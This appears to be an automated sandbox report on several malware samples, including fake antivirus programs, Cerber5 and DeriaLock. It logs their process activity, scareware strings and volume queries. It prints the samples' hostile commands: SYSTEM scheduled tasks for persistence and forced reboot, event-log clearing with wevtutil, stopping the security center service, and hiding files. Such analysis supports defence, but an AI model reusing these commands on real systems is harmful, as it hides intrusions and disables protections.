          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess created: unknown unknown
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wscsvc
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: this threat from your PC.You are using a trial version.It is recommended to purchase a commercial version.""Wintrust.dllCryptCATAdminCalcHashFromFileHandleCryptCATAdminEnumCatalogFromHashCryptCATAdminAcquireContextCryptCATAdminReleaseContextCryptCATCatalogInfoFromContextWM_LINK_CLICKEDWM_LINK_CLICKEDUpdateThreadStopChecking Internet connection...Starting to download updates...avtr.datswverdbverdbsignsdbverfdbsignsfavt_db/customers%s%s/%sDownloading update 100%Software successfully updated.\avt.dbswverswverdbverdbverdbsignsdbsigns%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dUpdate cancelled.Your software is up-to-date.Your software is up-to-date.LastUpdateDownloading update %d%%Check for updatesUpdate cancelled.LastUpdate%.2fdbverf%ddbsignsfDatabase version: %.2fVirus Signatures: %dYour software is up-to-date.Your software is up-to-date.Check for updatesWM_LINK_CLICKEDTrialTahomaTahomaCTransparentStaticCSystemTrayTaskbarCreatedTrayNotifyWndTrayClockWClassShell_TrayWndSupportTrebuchet MSTrebuchet MSTahomaTahomaTahomaTahomaE-mailSubjectMessageActivate Antivirus:
          Source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: License.txt\"notepad.exe "SecStatus_3SecStatus_4SecStatus_5FDGUID%08d%08d%08dGUID%WINDIR%%SYSDIR%Data:%d:Dataavthook.dll_StartExplorerHook@8swver3.0swverdbver1.1dbverdbsigns62577dbsignsswverdbverdbsignsdbverf1.1dbverfdbsignsf62577dbsignsfdbverfdbsignsfsplash.mp3AntivirusPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGPNGAntivirusWintrust.dllAntivirus_AntivirusgourlAntivirus (Unregistered version)httpgourlgourlEmailclick here to fix security problemsPNGPNGPNGPNG1-866 427 1693FDLicenseSecStatus_3SecStatus_4SecStatus_5Shell_TrayWndAVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sAntivirusYour copy already registered!AVT_BASIC/customers%s%s/buy.php?pid=%s&id=%s&subid=%sEmail/customers%s%s/auth/login/email/%sEmail/customers%s%s/auth/login/email/%sAVT_BASICGUID/customers%s%s/auth/autologin/email/%s@user.com/pid/%sAntivirusFDShell_TrayWndWM_LINK_CLICKEDLocal AppWizard-Generated ApplicationsSettings_06e722db8-b319-4933-9932-314a077920be-noscanrt8RBtVR0f1tQq9ra
          Source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmp, avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: Shell_TrayWnd
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: )@Shell_TrayWnd
          Source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Click "OK" to restart you computer now.AntivirusAll the found objects removed successfully!Shell_TrayWndButtonRAM checking available only for activated copy.
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: GetLocaleInfoA,5_2_0040A86C
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: GetLocaleInfoA,8_2_0040A845
          Source: C:\Users\user\Desktop\4d44bed6.exeQueries volume information: C:\Users\user\Desktop\4d44bed6.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeQueries volume information: C:\Users\user\Desktop\4d44bed6.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\Desktop\Endermanch@DeriaLock.exe VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeQueries volume information: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe VolumeInformation
